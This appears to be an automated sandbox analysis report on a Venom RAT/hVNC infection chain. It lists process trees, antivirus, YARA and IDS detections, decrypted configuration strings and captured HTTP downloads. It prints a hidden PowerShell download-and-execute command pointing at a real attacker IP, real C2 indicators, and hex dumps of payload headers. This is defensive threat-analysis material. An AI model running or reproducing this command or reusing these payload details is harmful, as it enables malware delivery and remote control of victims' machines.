Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline", ProcessId: 7196, ProcessName: csc.exe

Suricata Signatures

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T19:14:09.008753+0100	1810000	2	Potentially Bad Traffic	192.168.2.5	49714	185.149.146.164	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://147.45.44.131/infopage/ersyb.exe	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/iubn.ps1	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/iviewers.dll	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/rwvg1.exe	Avira URL Cloud: Label: malware
Source: http://185.149.146.164/wrcaf.ps1	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: 4449
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: 157.20.182.177
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: RAT + hVNC 6.0.5
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: false
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: rbdebzqnfarpyomol
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: MIICLjCCAZegAwIBAgIVAPMNUbaXLLtiHcN1m+dlPpK7vns9MA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAzMTgxNjQ3MjZaFw0zNDEyMjYxNjQ3MjZaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCaTwbFDhuWkASq9P+NWgPLnP41KwsDJJLX7xv2vo4FUXTwpEsoIrbqvSKldDp6m3lNHXNWYqqy0JX1ZnvClJ/gvVpmMCJfzkIDbW0sKPoOMmwx4PjzdNDQbKSSmM6rMMu8tDchwJEfQtMlgGPXFsMnPTYj6xNeMBCjcTIP5gwFCQIDAQABozIwMDAdBgNVHQ4EFgQU06NiTQAo8LSYzcJVCrt9Ah49blwwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQBg3cQkJK1HiQGjHKgDefp3ooSUSiEh+SRWC4Q/Jsp2TsM6Me9+ix/2g+oxV6/rhaeJkcDDCBtnjouhViDhezLBfl3oE0P29Ssq/skwUyjEZDScIepLewWrtQYtjyYbQL/ubsa0hoLDSZaKydxgH8cAtvOvMqE6WjrfEvcVupZLMQ==
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: Q+AFJAFiCL8OIXnK8vpppK2iElr5z1WborIl7rv6KiQoJrBbUTm5VXnSYAmidoRGFDhbPZQNsmEzkAX+OxkvuApCdcHhIykks+QzQbWVaQ2kFUGLle9WnlLZKzmw4R0L8hrBDa6GtG0avdXbvgSOzH5rALYyXUgmgBPNJoJdbSM=
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: null
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: false
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: false
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: Default
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: false
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack	String decryptor: false

Source:	Binary string: C:\Users\Administrator\source\repos\Project9\Release\Project9.pdb source: Package.exe, 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmp, iviewers.dll.3.dr
Source:	Binary string: OLEView.pdb source: powershell.exe, 00000003.00000002.2177596881.00000169B176B000.00000004.00000800.00020000.00000000.sdmp, Package.exe, Package.exe, 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Package.exe.3.dr
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.pdb source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_6E2F6CE9 FindFirstFileExW,

5_2_6E2F6CE9

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 11:05:36 GMTETag: "325e0-62ab7244bf291"Accept-Ranges: bytesContent-Length: 206304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 48 02 00 f0 00 00 00 00 60 02 00 90 96 00 00 00 00 00 00 00 00 00 00 00 04 03 00 e0 21 00 00 00 00 03 00 18 2a 00 00 f0 9e 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 9f 00 00 18 00 00 00 48 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 6c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 14 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 0e 00 00 00 30 02 00 00 08 00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 2c 1d 00 00 00 40 02 00 00 1e 00 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 96 00 00 00 60 02 00 00 98 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 2a 00 00 00 00 03 00 00 2c 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 11:05:39 GMTETag: "16000-62ab724726645"Accept-Ranges: bytesContent-Length: 90112Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 78 25 53 3b 19 4b 00 3b 19 4b 00 3b 19 4b 00 70 61 48 01 31 19 4b 00 70 61 4e 01 a8 19 4b 00 70 61 4f 01 2f 19 4b 00 3d 98 4e 01 24 19 4b 00 3d 98 4f 01 2a 19 4b 00 3d 98 48 01 2f 19 4b 00 70 61 4a 01 38 19 4b 00 3b 19 4a 00 6e 19 4b 00 56 98 42 01 3a 19 4b 00 56 98 4b 01 3a 19 4b 00 56 98 b4 00 3a 19 4b 00 56 98 49 01 3a 19 4b 00 52 69 63 68 3b 19 4b 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 72 76 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 26 00 de 00 00 00 88 00 00 00 00 00 00 63 13 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 03 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 4a 01 00 54 00 00 00 24 4b 01 00 28 00 00 00 00 80 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 2c 0f 00 00 b8 3e 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 3d 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 13 00 00 00 60 01 00 00 0a 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 80 01 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 2c 0f 00 00 00 90 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:13 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 10:33:38 GMTETag: "8a00-62ab6b1fe4fe2"Accept-Ranges: bytesContent-Length: 35328Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 69 0e 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 7a 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 0c 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 21 00 00 60 7d 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 3a 00 00 00 01 00 00 11 28 0f 00 00 0a 03 6f 10 00 00 0a 0a 02 8e 69 8d 15 00 00 01 0b 16 0c 16 0d 2b 17 07 09 02 09 91 06 08 91 61 d2 9c 08 17 58 06 8e 69 5d 0c 09 17 58 0d 09 02 8e 69 32 e3 07 2a 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 11 00 00 0a 03 28 01 00 00 06 0a 28 0f 00 00 0a 06 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 3e 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 60 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 8a 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1b 00 00 0a 72 ac 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 02 28 13 00 00 0a 2a 1a 28 04 00 00 06 2a 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 6a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 09:39:17 GMTETag: "2fdc00-62ab5ef921a41"Accept-Ranges: bytesContent-Length: 3136512Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 80 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1

Source: global traffic	HTTP traffic detected: GET /infopage/rwvg1.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/ersyb.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View

ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49714 -> 185.149.146.164:80

Source: global traffic	HTTP traffic detected: GET /wrcaf.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 185.149.146.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/file.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/iviewers.dll HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/iubn.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.149.146.164
Source: unknown	TCP traffic detected without corresponding DNS query: 185.149.146.164
Source: unknown	TCP traffic detected without corresponding DNS query: 185.149.146.164
Source: unknown	TCP traffic detected without corresponding DNS query: 185.149.146.164
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
